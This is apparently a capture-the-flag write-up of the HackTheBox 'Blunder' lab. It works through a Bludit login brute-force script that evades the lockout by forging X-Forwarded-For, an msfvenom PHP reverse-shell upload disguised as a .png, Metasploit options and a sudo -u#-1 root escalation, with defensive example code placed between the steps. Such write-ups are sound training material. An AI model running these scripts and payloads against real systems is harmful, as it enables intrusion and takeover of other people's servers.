[HTB] Blunder — Writeup

Recon

Nmap

```
$ nmap -Pn --open -p- -sC -sV 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-24 14:25 EDT
Nmap scan report for 10.10.10.191
Host is up (0.081s latency).
Not shown: 65533 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.15 seconds
```

Interesting Ports

Only 80/tcp is open: Apache httpd 2.4.41 (Ubuntu), page title "Blunder | A blunder of interesting facts". Everything that follows goes through this web application.

Dirsearch

```
$ python3 dirsearch.py -u http://10.10.10.191/ -e txt,php,asp,js | grep 200
[15:41:45] 200 -  563B - /.gitignore
[15:41:55] 200 -    3KB - /about
[15:42:00] 200 -    2KB - /admin/
[15:42:51] 200 -   30B - /install.php
[15:42:54] 200 -    1KB - /LICENSE
[15:43:13] 200 -    3KB - /README.md
[15:43:14] 200 -   22B - /robots.txt
```

FFUF

```
$ ./ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -e .txt -u http://10.10.10.191/FUZZ -fc 403

 :: Method           : GET
 :: URL              : http://10.10.10.191/FUZZ
 :: Extensions       : .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response status: 403
________________________________________________

LICENSE                 [Status: 200, Size: 1083, Words: 155, Lines: 22]
about                   [Status: 200, Size: 3280, Words: 225, Lines: 106]
admin                   [Status: 301, Size: 0, Words: 1, Lines: 1]
cgi-bin/                [Status: 301, Size: 0, Words: 1, Lines: 1]
robots.txt              [Status: 200, Size: 22, Words: 3, Lines: 2]
robots.txt              [Status: 200, Size: 22, Words: 3, Lines: 2]
todo.txt                [Status: 200, Size: 118, Words: 20, Lines: 5]
```

Initial Foothold

Password Brute-forcing

Bludit's login lockout counts failed attempts per client IP, and the IP comes from this function (bl-kernel/security.class.php, the bypass tracked as CVE-2019-17240 in 3.9.2 and earlier). The first two sources it trusts, X-Forwarded-For and Client-IP, are plain request headers the client controls, so every login attempt can present a fresh "IP" and the counter never reaches the lockout threshold:

```php
public function getUserIp()
{
    // Attacker-controlled headers are consulted before the real socket peer.
    if (getenv('HTTP_X_FORWARDED_FOR')) {
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif (getenv('HTTP_CLIENT_IP')) {
        $ip = getenv('HTTP_CLIENT_IP');
    } else {
        $ip = getenv('REMOTE_ADDR');
    }
    return $ip;
}
```
A wordlist is built from the site's own text with cewl:

```
# cewl http://10.10.10.191 > tmp && cewl http://10.10.10.191/about >> tmp && sort -u tmp > passList.txt
```

I modified the provided POC script in order to supply the password file. Using this script, I was able to obtain the password for the user `fergus`.
```python
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

with open('passList.txt') as fp:
    line = fp.read().splitlines()

for password in line:
    # Fresh session per attempt: fetch the login form and pull the CSRF token out of it.
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[INFO] Trying: {p}'.format(p = password))

    # The candidate password doubles as the X-Forwarded-For value, so getUserIp()
    # returns a different "IP" on every attempt and the lockout counter never trips.
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login answers with a redirect to the dashboard.
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('[INFO] SUCCESS: Password found!')
            print('[INFO] Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
```
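To make the bypass concrete from the defender's side, the following is an added example (not code from this writeup or from Bludit): a minimal lockout keyed on a resolved client IP, with the getUserIp() logic from above ported as one resolver and a hardened resolver beside it. The lockout threshold (10), the trusted proxy address (10.0.0.5), the attacker address and the wordlist are all constructed assumptions; the real password is the one found on this box.

```python
"""Added example: why a lockout keyed on getUserIp() can be replayed past, and what keying holds up."""
from collections import defaultdict

MAX_FAILURES = 10                 # assumption: failures per IP before the lockout kicks in
TRUSTED_PROXIES = {"10.0.0.5"}    # assumption: the only hop allowed to set X-Forwarded-For


def client_ip_bludit(env):
    """Port of the getUserIp() logic above: client-supplied headers win over the socket peer."""
    return env.get("HTTP_X_FORWARDED_FOR") or env.get("HTTP_CLIENT_IP") or env.get("REMOTE_ADDR")


def client_ip_hardened(env):
    """Honour X-Forwarded-For only when the TCP peer is a trusted reverse proxy, and then use
    the rightmost entry (the one that proxy appended); everything else is client-controlled."""
    peer = env.get("REMOTE_ADDR")
    xff = env.get("HTTP_X_FORWARDED_FOR")
    if peer in TRUSTED_PROXIES and xff:
        return xff.split(",")[-1].strip()
    return peer


class LoginGuard:
    """Minimal lockout: count failures per resolved IP, refuse once the threshold is reached."""

    def __init__(self, resolve_ip):
        self.resolve_ip = resolve_ip
        self.failures = defaultdict(int)

    def attempt(self, env, password, real_password="RolandDeschain"):
        ip = self.resolve_ip(env)
        if self.failures[ip] >= MAX_FAILURES:
            return "locked"
        if password == real_password:
            return "ok"
        self.failures[ip] += 1
        return "denied"


def run_bruteforce(resolve_ip, candidates, attacker_ip="10.10.14.15"):
    """Replay the PoC's trick: every request comes from the same peer but carries the
    candidate password in X-Forwarded-For, exactly as the script above sends it."""
    guard = LoginGuard(resolve_ip)
    results = []
    for pw in candidates:
        env = {"REMOTE_ADDR": attacker_ip, "HTTP_X_FORWARDED_FOR": pw}
        results.append(guard.attempt(env, pw))
    return results


# Constructed wordlist: twelve wrong guesses, then the password that works on this box.
CANDIDATES = [f"word{i}" for i in range(12)] + ["RolandDeschain"]

if __name__ == "__main__":
    print("bludit  :", run_bruteforce(client_ip_bludit, CANDIDATES))    # ..., 'ok'
    print("hardened:", run_bruteforce(client_ip_hardened, CANDIDATES))  # 10 x denied, then locked
```

With the Bludit-style resolver every attempt is counted under a different key, so the thirteenth request still reaches the password check; with the hardened resolver the same sequence is counted under the real peer address and the correct password arrives after the lockout. The rule to take away is that REMOTE_ADDR is the only value the client cannot forge, and a forwarding header is only meaningful when the peer is a proxy you control.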

Bludit 3.9.2 — Directory Traversal Image Upload

Two files are uploaded: a PHP reverse shell carrying a .png name, and an .htaccess that makes Apache execute .png files in the target directory as PHP. The .png extension is what gets the payload past the image upload; the AddType line is what turns it back into code, and RewriteEngine off keeps the rewrite rules inherited from Bludit's own .htaccess from getting in the way.

```
### Creating evil.png
$ msfvenom -p php/reverse_php LHOST=10.10.14.15 LPORT=443 -f raw -b '"' > evil.png
$ echo -e "<?php $(cat evil.png)" > evil.png

### Creating .htaccess
$ echo "RewriteEngine off" > .htaccess
$ echo "AddType application/x-httpd-php .png" >> .htaccess
```

This step only works because Apache honours .htaccess under bl-content (AllowOverride permits it). On a hardened install, AllowOverride None for the upload tree, or a PHP engine that is switched off for those directories, leaves the uploaded .htaccess without effect.
The PoC only needs the target and the credentials recovered above:

```python
…snip…
url = 'http://10.10.10.191' # CHANGE ME
username = 'fergus' # CHANGE ME
password = 'RolandDeschain' # CHANGE ME
…snip…
```
```
$ python3 poc.py
cookie: 335s5kf5clu2j8pe3oe23k93k1
csrf_token: ef167ea5717fc72c4359195bd051aaf3495918ae
Uploading payload: evil.png
Uploading payload: .htaccess
```
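The upload above gets through on three counts: the page uuid is used as a path component without being confined to the upload root, the file name is checked only by extension, and a dotfile is accepted. The following is an added example (not code from this writeup or from Bludit) of a validator that closes all three, run over the same artefacts the exploit uses. The upload root path, the example uuid and the file contents are constructed for the demonstration.

```python
"""Added example: a hardened image-upload validator exercised with the writeup's own payloads."""
import os
import re

UPLOAD_ROOT = "/var/www/bludit/bl-content/uploads/pages"   # assumption: where page images belong
# extension -> magic bytes the file must actually start with
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def safe_target_dir(uuid):
    """The uuid becomes a directory under UPLOAD_ROOT; refuse anything that could escape it."""
    if not SAFE_NAME.fullmatch(uuid) or uuid.startswith("."):
        return None
    target = os.path.normpath(os.path.join(UPLOAD_ROOT, uuid))
    if os.path.commonpath([UPLOAD_ROOT, target]) != UPLOAD_ROOT:   # belt and braces
        return None
    return target


def validate_upload(uuid, filename, content):
    """Return (ok, detail): detail is the rejection reason or the directory the file may go to."""
    target = safe_target_dir(uuid)
    if target is None:
        return False, "uuid traverses outside the upload root"
    if not SAFE_NAME.fullmatch(filename) or filename.startswith("."):
        return False, "dotfile or unsafe filename (this is what blocks .htaccess)"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        return False, f"extension '{ext}' not allowed"
    if not content.startswith(ALLOWED[ext]):
        return False, "content is not the image type the name claims"
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP open tag"
    return True, target


# Constructed stand-ins for the three files involved in the upload above.
EVIL_PNG = b"<?php /* msfvenom reverse_php payload would be here */ ?>"   # PHP under a .png name
HTACCESS = b"RewriteEngine off\nAddType application/x-httpd-php .png\n"
REAL_PNG = ALLOWED["png"] + b"\x00" * 16                                  # header only, enough here


def demo():
    """Outcome of each upload attempt against the hardened validator."""
    return {
        "evil.png via ../../tmp": validate_upload("../../tmp", "evil.png", EVIL_PNG)[0],
        "evil.png in place":      validate_upload("b3c1", "evil.png", EVIL_PNG)[0],
        ".htaccess":              validate_upload("b3c1", ".htaccess", HTACCESS)[0],
        "real png":               validate_upload("b3c1", "logo.png", REAL_PNG)[0],
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:24s} {'accepted' if ok else 'rejected'}")
```

The magic-byte check is what defeats the "PHP with a .png name" trick regardless of where the file lands, and the dotfile rule is what keeps .htaccess out; the uuid confinement removes the traversal that put both files in bl-content/tmp. None of this replaces the Apache-side fix (AllowOverride None for upload directories), which is the layer that stops an attacker-supplied .htaccess from ever being consulted.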

Privilege Escalation

www-data → hugo (user.txt)

Identifying the recovered hash:

```
# hash-identifier
HASH: faca404fd5c0a31cf1897b823c695c85cffeb98d

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
```
The same upload is also available as a Metasploit module; the options used for the www-data shell:

```
msf5 exploit(linux/http/bludit_upload_images_exec) > options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS  RolandDeschain   yes       The password for Bludit
   BLUDITUSER  fergus           yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      10.10.10.191     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.15      yes       The listen address (an interface may be specified)
   LPORT  443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2
```
```
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su -l hugo
Password: Password120
hugo@blunder:~$ ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
hugo@blunder:~$ cat user.txt
18941d126772300c8ea22297f4cd66e6
```

hugo → root (CVE-2019-14287)

```
hugo@blunder:~$ sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
```

The rule lets hugo run /bin/bash as any user except root, and asking for root by number (-u#0) is refused as expected. sudo versions before 1.8.28, however, accept -u#-1 (equivalently -u#4294967295): the runas check sees a uid that is not 0 and passes, but when sudo then calls setresuid() with that value the kernel treats -1 as "leave this id unchanged", so the process keeps the uid 0 that sudo already runs with. The gid stays hugo's (1001) because no -g was given, which is exactly what `id` shows below. Checking `sudo --version` against 1.8.28 is the quick test for this on any box that grants a `(ALL, !root)` style rule.

```
hugo@blunder:~$ sudo -u#0 /bin/bash
Password: Password120
Sorry, user hugo is not allowed to execute '/bin/bash' as root on blunder.
hugo@blunder:~$ sudo -u#-1 /bin/bash
Password: Password120
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# cat /root/root.txt
f278317a8593bd7363e8de5b8b29d6a0
```
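The bug is three components disagreeing about the number -1, and that is easiest to see written out. The following is an added example (not code from this writeup or from sudo's source): a model of the uid parsing, the `(ALL, !root)` policy check and the kernel's setresuid() rule, plus a live call showing that setresuid(-1, -1, -1) changes nothing for any user. The 32-bit uid_t width and the 1.8.28 fix behaviour are real; the function names are this example's own.

```python
"""Added example: the three views of uid -1 behind CVE-2019-14287, modelled and checked live."""
import os

UID_MAX = 0xFFFFFFFF   # uid_t is a 32-bit unsigned integer on Linux


def resolve_runas_uid(spec):
    """'-u#N' asks sudo for a numeric uid. Before 1.8.28 a negative N was accepted and, stored
    into an unsigned uid_t, wraps the way a C cast does: -1 becomes 4294967295."""
    if not spec.startswith("#"):
        raise ValueError("only numeric '#uid' specs are modelled here")
    return int(spec[1:]) & UID_MAX


def runas_allowed(target_uid):
    """The sudoers rule on the box, (ALL, !root): any target except uid 0."""
    return target_uid != 0


def uid_after_setresuid(requested, current):
    """Kernel semantics: setresuid()/setreuid() treat (uid_t)-1 as 'leave this id unchanged'."""
    return current if requested == UID_MAX else requested


def simulate(spec):
    """Walk one 'sudo -u<spec> /bin/bash' through policy and the credential change.
    sudo is setuid root, so the process already holds uid 0 when it changes identity."""
    target = resolve_runas_uid(spec)
    if not runas_allowed(target):
        return ("denied", None)
    return ("allowed", uid_after_setresuid(target, current=0))


def fixed_sudo_rejects(spec):
    """sudo 1.8.28 refuses -1 / 4294967295 as a runas id outright; that is the fix for this CVE."""
    return resolve_runas_uid(spec) == UID_MAX


def live_setresuid_minus_one():
    """No privilege needed: setresuid(-1, -1, -1) is a no-op for everyone. Returns (before, after)."""
    before = os.getuid()
    if hasattr(os, "setresuid"):          # not present on every platform
        os.setresuid(-1, -1, -1)
    return before, os.getuid()


if __name__ == "__main__":
    print("sudo -u#0    ->", simulate("#0"))      # ('denied', None): root is excluded by name
    print("sudo -u#1001 ->", simulate("#1001"))   # ('allowed', 1001): a normal target user
    print("sudo -u#-1   ->", simulate("#-1"))     # ('allowed', 0): policy passes, uid never moves
    print("1.8.28 rejects #-1:", fixed_sudo_rejects("#-1"))
    print("live setresuid(-1,-1,-1):", live_setresuid_minus_one())
```

The policy layer and the kernel layer are each internally consistent; the escalation comes from the value passing through both with a different meaning at each. The `live_setresuid_minus_one()` call is the kernel half done for real: run it as any unprivileged user and the uid before and after are the same.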

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
